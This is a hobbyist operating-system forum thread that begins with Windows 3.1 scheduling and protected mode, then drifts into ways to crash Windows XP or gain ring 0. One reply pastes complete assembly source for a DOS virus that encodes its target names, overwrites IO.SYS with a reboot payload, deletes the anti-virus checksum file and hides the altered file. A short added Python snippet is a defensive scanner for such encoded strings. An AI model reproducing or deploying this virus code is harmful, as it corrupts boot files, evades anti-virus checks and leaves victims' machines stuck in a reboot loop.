windows 3.1 fun
Re: windows 3.1 fun
that's what i was thinking, trash data or DLLs stored in memory. maybe even the kernel, i will try that tonight, see what happens and report back to you guys
- Combuster
- Member
- Posts: 9301
- Joined: Wed Oct 18, 2006 3:45 am
- Libera.chat IRC: [com]buster
- Location: On the balcony, where I can actually keep 1½m distance
Re: windows 3.1 fun
History told that Windows for workgroups was cooperatively scheduled. There was a program that could play wave files over the PC speaker, and to do so it had to lockstep with the PIT. Which meant that other programs were denied processor time because it didn't use system calls, which would otherwise have yielded the timeslice. And that was exactly what happened - the computer froze for the duration of the wavefile. Even the mouse wouldn't move.
- Colonel Kernel
- Member
- Posts: 1437
- Joined: Tue Oct 17, 2006 6:06 pm
- Location: Vancouver, BC, Canada
Re: windows 3.1 fun
Love4Boobies wrote: IIRC, Windows 3.1 can also be ran in the infamous 16-bit protected mode for 80286+ CPUs, not just in real mode.
Actually, 3.1 ran in 16-bit protected mode most of the time. There hasn't been a real mode Windows since 2.0-ish. Just about everyone gets these details wrong, because Windows had a complex evolution. I have tried to set it straight several times on these forums -- do a search and you'll find some interesting stuff.
Top three reasons why my OS project died:
- Too much overtime at work
- Got married
- My brain got stuck in an infinite loop while trying to design the memory manager
Re: windows 3.1 fun
Combuster: wow even the mouse froze, and the wave file still played, cool.
(offtopic, don't have to respond to this) i wonder if there is a way to crash csrss.exe on windows xp using assembly?
Re: windows 3.1 fun
GhostXoPCorp wrote: Combuster: wow even the mouse froze, and the wave file still played, cool.
(offtopic, don't have to respond to this) i wonder if there is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
Re: windows 3.1 fun
well
one of my friends showed me some code, to make your own code in windows xp run in ring 0 !!
so that might be what you need
and then in ring 0, just "CLI" then windows is DOWN
however, i have not tried it ..
KMT dk
well, what to say, too much to do in too little space.
when it goes up hill, increase work, when it goes straight, test yourself but when going down, slow down.
Re: windows 3.1 fun
kmtdk wrote: well
one of my friends showed me some code, to make your own code in windows xp run in ring 0 !!
so that might be what you need
and then in ring 0, just "CLI" then windows is DOWN
however, i have not tried it ..
KMT dk
Well yea if you're running in ring 0 you can do anything lol. Device drivers run in kernel space.
Re: windows 3.1 fun
how do you run your program in windows XP ring 0?
Re: windows 3.1 fun
dude101 wrote:
GhostXoPCorp wrote: Combuster: wow even the mouse froze, and the wave file still played, cool.
(offtopic, don't have to respond to this) i wonder if there is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
or have the user say "yes" to some prompt about accounts.. or wait that's vista... assuming you are running as an administrator, fully possible.. install a driver... you can talk windows users into anything. "There is an updated driver for your monitor that will make it show cute little bunnies. just say yes to the following prompt"... Also, isn't there a way to start applications/drivers at the very core of startup? One guy charged like $800 or something for ramdisk software for windows. I asked him why it was so expensive (and yes, he did sell it, and well) and he said because it was loaded as one of the base drivers of windows, meaning the kernel could use it at a very early stage. Because of this however, he had to write his own NTFS code because at that early of a stage, who knows if the "real" NTFS driver is loaded yet or not...or maybe it was BS to shut me up... lol
oh yea, and ring 0 in XP involves using a special hack with the "at" command so that you start a new process as "SYSTEM"
I haven't tried it myself though...
- Combuster
Re: windows 3.1 fun
In your case, I suggest throwing your computer out the window to crash windows, csrss.exe included
*ducks and runs*
- Masterkiller
- Member
- Posts: 153
- Joined: Sat May 05, 2007 6:20 pm
Re: windows 3.1 fun
dude101 wrote:
GhostXoPCorp wrote: Combuster: wow even the mouse froze, and the wave file still played, cool.
(offtopic, don't have to respond to this) i wonder if there is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
So... ReadProcessMemory and WriteProcessMemory are bugs in the OS?
ALCA OS: Project temporarily suspended!
Current state: real-mode kernel-FS reader...
- Troy Martin
- Member
- Posts: 1686
- Joined: Fri Apr 18, 2008 4:40 pm
- Location: Langley, Vancouver, BC, Canada
Re: windows 3.1 fun
Hey Ghost, the code in your signature is wrong... It jumps to segment 8000h, which would be linear 80000h... but I shouldn't have to tell you that, now should I?
Re: windows 3.1 fun
Masterkiller wrote:
dude101 wrote:
GhostXoPCorp wrote: Combuster: wow even the mouse froze, and the wave file still played, cool.
(offtopic, don't have to respond to this) i wonder if there is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
So... ReadProcessMemory and WriteProcessMemory are bugs in the OS?
Well there is that.. doubt it allows you to write to SYSTEM processes though, and you have to be administrator to go from user A process to user B process... (Really I now fully appreciate how dangerous it is running as "root" in windows, as everyone does just about)
- Posts: 3
- Joined: Mon Jun 08, 2009 11:51 am
Re: windows 3.1 fun
Here try this, I wrote it back in the 1800's or so. It just keeps rebooting...
; REBOOT - Virus written by Bill Hudson
P8086 ;select the processor
MODEL TINY ;always must be TINY model
DATASEG
FName1 DB 'c'-20 ; File to be INFECTED (CODED)
DB ':'-20,'\'-20,'i'-20,'o'-20
DB '.'-20,'s'-20,'y'-20,'s'-20
;FName1 DB 'c:\io.sys' ; File to be INFECTED
EOF DW 2400h
FName2 DB 'c'-20 ; MS Anti-Virus CHECKSUMS file
DB ':'-20,'\'-20,'c'-20,'h'-20
DB 'k'-20,'l'-20,'i'-20,'s'-20
DB 't'-20,'.'-20,'m'-20,'s'-20
;FName2 DB 'c:\chklist.ms' ; MS Anti-Virus CHECKSUMS file
DW 1A00h
UDATASEG
DW 100H DUP (?)
MyStack LABEL WORD
CODESEG
STARTUPCODE
MOV SP,OFFSET MyStack
CALL DoIt
MOV AH,4CH ; AL has DOS Exit Code in it (see end of DOIT)
INT 21H ; Exit to DOS
RET
DoIt PROC NEAR
PUSH AX BX CX DX
MOV BX,OFFSET FName1
MOV CX,9
Decode1:
ADD BYTE PTR [BX],20
INC BX
LOOP DeCode1
MOV BX,OFFSET FName2
MOV CX,13
Decode2:
ADD BYTE PTR [BX],20
INC BX
LOOP DeCode2
MOV AX,4301h ; Set ATTRIB
MOV CX,0 ; None
MOV DX,OFFSET FName1 ; IO.SYS
INT 21h
MOV EOF,1A00h ; Change for open file
MOV AX,3D02h ; OPEN for WRITE
INT 21h
MOV BX,AX ; Get HANDLE in BX
MOV AX,4200h ; SEEK byte
XOR CX,CX
MOV DX,0238h
INT 21h
MOV AX,4000h ; Write to file
MOV CX,OFFSET ReBoot - OFFSET EndMsg ; VIRUS length
MOV DX,OFFSET ReBoot ; VIRUS
PUSH DS ; Save data seg
PUSH CS ; Get code seg
POP DS ; In data seg
INT 21h
POP DS ; Restore data seg
MOV AX,3E00h ; Close IO.SYS
INT 21h
MOV AX,4100h ; Delete file
MOV DX,OFFSET Fname2 ; CHKLIST.MS
INT 21h
MOV EOF,2400h ; Change for Attrib
MOV AX,4301h ; Set ATTRIB
MOV CX,7 ; SYSTEM - HIDDEN - READONLY
MOV DX,OFFSET FName1
INT 21h
POP DX CX BX AX
MOV AL,1 ; DOS Exit Code
RET
DoIt ENDP
ReBoot:
MOV AX,0B800h ; Screen seg
MOV ES,AX ; Into ES
MOV BX,609 ; Location of Msg (HARD-CODED)
; ReBoot is at 568 (0238h)
MOV DI,3077 ; Screen Address
MOV AL,17h ; Attribute
MOV CX,44 ; 44 bytes
CLD ; INC DI after STOSW
ReBoot1:
MOV AH,CS:[BX] ; Get a byte from message
ADD AX,1400h ; ADD 20 to DECODE
STOSW ; Write byte to screen
INC BX ; Next byte in Msg
LOOP ReBoot1
MOV AX,40h ; Seg 40 BIOS DATA AREA
MOV ES,AX ; In ES
MOV ES:72h,1200h ; REBOOT FLAG
INT 19H ; REBOOT
EndReBoot:
Msg:
DB 'Y'-20,'o'-20,'u'-20,'r'-20,' '-20
DB 's'-20,'y'-20,'s'-20,'t'-20,'e'-20
DB 'm'-20,' '-20,'h'-20,'a'-20,'s'-20
DB ' '-20,'b'-20,'e'-20,'e'-20,'n'-20
DB ' '-20,'I'-20,'N'-20,'F'-20,'E'-20
DB 'C'-20,'T'-20,'E'-20,'D'-20,' '-20
DB 'b'-20,'y'-20,' '-20,'R'-20,'E'-20
DB 'B'-20,'O'-20,'O'-20,'T'-20,'!'-20
DB '!'-20,'!'-20,' '-20,' '-20
EndMsg:
; MSG: DB 'Your system has been INFECTED by REBOOT!!! '
END
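Added example, not part of the original post: the listing above stores its file names as each character minus 20, so a plain strings scan of the binary will not show them. A defender's triage sketch that tries every single-byte additive key and reports where watched DOS paths surface; `WATCHLIST`, `SAMPLE` and the function names are constructed for illustration.

```python
# Added example, not from the original post. WATCHLIST and SAMPLE are
# constructed; SAMPLE mirrors the data-segment layout of the listing above.
WATCHLIST = [b"c:\\io.sys", b"c:\\chklist.ms"]

def encode(plain: bytes, key: int) -> bytes:
    """Store each byte minus `key` (mod 256), like DB 'c'-20 in the listing."""
    return bytes((b - key) % 256 for b in plain)

def find_offset_encoded(sample: bytes, needles=WATCHLIST):
    """Return sorted (position, key, decoded_name) for every watchlist hit.

    Each needle is encoded under all 256 additive keys and searched for, which
    finds the same hits as decoding the sample 256 times. Key 0 is plaintext.
    DOS paths are case-insensitive, so both cases are tried.
    """
    hits = []
    for needle in needles:
        for variant in {needle.lower(), needle.upper()}:
            for key in range(256):
                pattern = encode(variant, key)
                pos = sample.find(pattern)
                while pos != -1:
                    hits.append((pos, key, variant.decode("ascii")))
                    pos = sample.find(pattern, pos + 1)
    return sorted(hits)

def decode_run(sample: bytes, pos: int, key: int) -> str:
    """Decode from `pos` until the first byte that is not printable ASCII."""
    out = bytearray()
    for b in sample[pos:]:
        c = (b + key) % 256
        if not 0x20 <= c <= 0x7E:
            break
        out.append(c)
    return out.decode("ascii")

# Constructed sample: padding, both names stored minus 20, each followed by the
# little-endian word that follows it in the listing (2400h, 1A00h).
SAMPLE = (b"\x00" * 8 + encode(WATCHLIST[0], 20) + b"\x00\x24"
          + encode(WATCHLIST[1], 20) + b"\x00\x1a" + b"\x00" * 4)

if __name__ == "__main__":
    for pos, key, name in find_offset_encoded(SAMPLE):
        run = decode_run(SAMPLE, pos, key)
        print(f"offset {pos:#06x}  key {key:3d}  {name!r}  run={run!r}")
```

A hit on a boot file or an anti-virus checksum file under a non-zero key is a stronger signal than the plaintext name, since ordinary tools have no reason to store those paths shifted.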
Re: windows 3.1 fun
troy: so? i just put random stuff down for a joke, sometimes my random stuff is wrong, doesn't matter, it's funny right?